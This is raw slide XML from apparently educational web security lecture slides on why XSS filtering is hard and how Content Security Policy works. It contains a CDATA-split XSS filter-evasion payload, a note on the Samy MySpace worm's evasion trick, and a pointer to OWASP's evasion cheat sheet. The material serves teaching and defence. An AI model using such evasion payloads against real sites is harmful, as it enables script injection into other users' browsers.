              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9E0184-6CBB-454A-A988-C8F0CAE73D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346200" y="4525963"/>
            <a:ext cx="5330825" cy="738187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SRC="javas]]&gt;&lt;!</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[CDATA[cript:alert(’XSS’);"&gt;]]&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E73D0BD-DA33-EF4F-885B-63DBE8FCCD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5818188"/>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006C0CC8-488F-4946-8B7A-187C7AEA2772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5767388"/>
            <a:ext cx="7748588" cy="4159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Worse: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“help” by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>broken</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93DEE07C-AA02-434D-BD18-530DFE19E213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="66532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75116" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4FDCB0-5276-CF41-AF4C-3354BCAF86D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="6580188"/>
            <a:ext cx="7727950"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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Samy figured out that IE permits javascript tag to  be split across two lines; evaded MySpace filter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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C24A270-B0AD-9543-B53A-5B766BAF83D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Filtering is Really Hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176131" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{950484A2-94A2-F240-884A-D42C9C1E64A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP: XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202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5CFE26C-1025-E94A-85C3-9881F212A39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1244600"/>
            <a:ext cx="6249988" cy="831850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-535" dirty="0"/>
              <a:t>Content </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-458" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-861" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-530" dirty="0"/>
              <a:t>Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177155" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44565EAD-A68E-774C-B503-25ED821F2851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2847975"/>
            <a:ext cx="8469313"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744" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="4572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50"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSP allows for server administrators to eliminate XSS attacks by specifying  the domains that the browser should consider to be valid sources of  executable scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1113"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser will only execute scripts loaded in source files received from  whitelisted domains, ignoring all other scripts (including inline scripts and  event-handling HTML attributes).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BC20AC8-E214-8946-81E1-72BD88F204E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005138" y="1244600"/>
            <a:ext cx="4044950" cy="831850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-553" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-856" dirty="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-828" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-405" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411E1E0C-A3BE-924F-97BB-36946155418B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="3146425"/>
            <a:ext cx="6357938" cy="311150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6672" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="33" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="13" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="18" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be loaded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-8" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-110" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:endParaRPr sz="1976">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E058AC2-1199-074F-B416-B1177CDBC07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="3905250"/>
            <a:ext cx="6464300" cy="255588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4F0F5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2001"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2101" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Content-Security-Policy: default-src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2101" spc="3" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2101" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'self'</a:t>
            </a:r>
            <a:endParaRPr sz="2101">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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714FA51-EABD-8740-9ABD-19F507A82ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005138" y="1244600"/>
            <a:ext cx="4044950" cy="831850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-553" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-856" dirty="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-828" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-405" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED371B2-EA7E-304A-B14E-E38B713433C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="2422525"/>
            <a:ext cx="6202363" cy="1217613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="119455" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="941"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1626" b="1" spc="-18" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Allow:</a:t>
            </a:r>
            <a:endParaRPr sz="1626">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="195697" indent="-131842" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1946"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="895"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="196015" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1626" spc="20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="8" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>images </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="23" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-3" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="13" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>their </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="38" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>own </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="-73" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="48" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>but</a:t>
            </a:r>
            <a:endParaRPr sz="1626">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="195697" indent="-131842" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1939"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="*"/>
              <a:tabLst>
                <a:tab pos="196015" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1626" spc="20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>restrict audio or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="18" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>video </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>media </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="50" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1626" spc="28" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trusted </a:t>
            </a:r>
            <a:r>
